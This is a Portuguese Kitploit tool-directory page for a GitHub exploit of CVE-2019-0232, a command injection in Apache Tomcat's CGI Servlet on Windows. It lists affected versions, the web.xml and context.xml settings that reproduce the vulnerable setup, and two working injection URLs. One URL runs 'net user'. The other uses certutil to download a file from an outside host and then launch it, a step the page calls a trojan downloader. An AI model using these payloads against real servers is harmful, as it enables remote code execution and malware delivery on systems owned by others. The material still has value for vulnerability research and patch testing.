Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-0232-EXP — Exploit para injeção de comando no Servlet CGI do Apache Tomcat (CVE-2019-0232) que permite execução remota de código através de requisições HTTP manipuladas em versões afetadas. | Kitploit
Ferramentas/GitHubGitHub/cyy95/cve-2019-0232-exp
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebComando e Controle
GitHubcyy95/cve-2019-0232-exp

CVE-2019-0232-EXP

Exploit para injeção de comando no Servlet CGI do Apache Tomcat (CVE-2019-0232) que permite execução remota de código através de requisições HTTP manipuladas em versões afetadas.

Ver Repositório
331há 7 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2019-0232-EXP

Ambiente de teste: Win10 Home 1809, versão JRE 18.3 (build 10.0.2+13), versão Tomcat 9.0.13.

Versões do Tomcat afetadas

★Apache Tomcat 9.0.0.M1 a 9.0.17
★Apache Tomcat 8.5.0 a 8.5.39
★Apache Tomcat 7.0.0 a 7.0.93

Configuração conf/web.xml

root@kitploit:~
<servlet>
    <servlet-name>cgi</servlet-name>
    <servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
    <init-param>
      <param-name>cgiPathPrefix</param-name>
      <param-value>WEB-INF/cgi-bin</param-value>
    </init-param>
    <init-param>
      <param-name>enableCmdLineArguments</param-name>
      <param-value>true</param-value>
    </init-param>
    <init-param>
      <param-name>executable</param-name>
      <param-value></param-value>
    </init-param>
    <load-on-startup>5</load-on-startup>
</servlet>

Configuração do mapeamento do Servlet:

root@kitploit:~
<servlet-mapping>
        <servlet-name>cgi</servlet-name>
        <url-pattern>/cgi-bin/*</url-pattern>
</servlet-mapping>

Configuração conf/context.xml

Adicione o atributo privileged="true"

root@kitploit:~
<Context privileged="true">
   <WatchedResource>WEB-INF/web.xml</WatchedResource>
   <WatchedResource>WEB-INF/tomcat-web.xml</WatchedResource>
   <WatchedResource>${catalina.base}/conf/web.xml</WatchedResource>
</Context>

Por último, crie um arquivo vazio hello.bat em webapps/ROOT/WEB-INF, sem precisar escrever nada dentro. Inicie o Tomcat, abra o navegador e acesse o link abaixo: http://localhost:8080/cgi-bin/hello.bat?&C%3a%5cWindows%5cSystem32%5Cnet+user

Teste de injeção

Cenário de exploração da vulnerabilidade

Construa um link de injeção para implementar a funcionalidade de um downloader de imagem (cavalo de troia): http://localhost:8080/cgi-bin/hello.bat?&C%3a%5cWindows%5cSystem32%5ccertutil+-urlcache+-split+-f+http%3a%2f%2fb.hiphotos.baidu.com%2fimage%2fpic%2fitem%2f9825bc315c6034a8ef5250cec5134954082376c9.jpg+1.jpg+%26start+1.jpg

Downloader de imagem

Baixar ferramenta